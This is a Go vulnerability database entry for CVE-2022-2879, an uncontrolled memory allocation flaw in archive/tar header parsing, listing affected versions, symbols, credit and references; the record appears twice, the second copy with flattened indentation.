data/reports/GO-2022-1037.yaml - vulndb - Git at Google

 modules:
   - module: std
     versions:
       - fixed: 1.18.7
       - introduced: 1.19.0
         fixed: 1.19.2
     vulnerable_at: 1.19.1
     packages:
       - package: archive/tar
         symbols:
           - Reader.next
           - parsePAX
           - Writer.writePAXHeader
         derived_symbols:
           - Reader.Next
           - Writer.WriteHeader
 description: |
     Reader.Read does not set a limit on the maximum size of file headers.
     A maliciously crafted archive could cause Read to allocate unbounded
     amounts of memory, potentially causing resource exhaustion or panics.
     After fix, Reader.Read limits the maximum size of header blocks to 1 MiB.
 credit: Adam Korczynski (ADA Logics) and OSS-Fuzz
 references:
   - report: https://go.dev/issue/54853
   - fix: https://go.dev/cl/439355
   - web: https://groups.google.com/g/golang-announce/c/xtuG5faxtaU
 cve_metadata:
     id: CVE-2022-2879
     cwe: 'CWE 400: Uncontrolled Resource Consumption'
	modules:
	- module: std
	versions:
	- fixed: 1.18.7
	- introduced: 1.19.0
	fixed: 1.19.2
	vulnerable_at: 1.19.1
	packages:
	- package: archive/tar
	symbols:
	- Reader.next
	- parsePAX
	- Writer.writePAXHeader
	derived_symbols:
	- Reader.Next
	- Writer.WriteHeader
	description: \|
	Reader.Read does not set a limit on the maximum size of file headers.
	A maliciously crafted archive could cause Read to allocate unbounded
	amounts of memory, potentially causing resource exhaustion or panics.
	After fix, Reader.Read limits the maximum size of header blocks to 1 MiB.
	credit: Adam Korczynski (ADA Logics) and OSS-Fuzz
	references:
	- report: https://go.dev/issue/54853
	- fix: https://go.dev/cl/439355
	- web: https://groups.google.com/g/golang-announce/c/xtuG5faxtaU
	cve_metadata:
	id: CVE-2022-2879
	cwe: 'CWE 400: Uncontrolled Resource Consumption'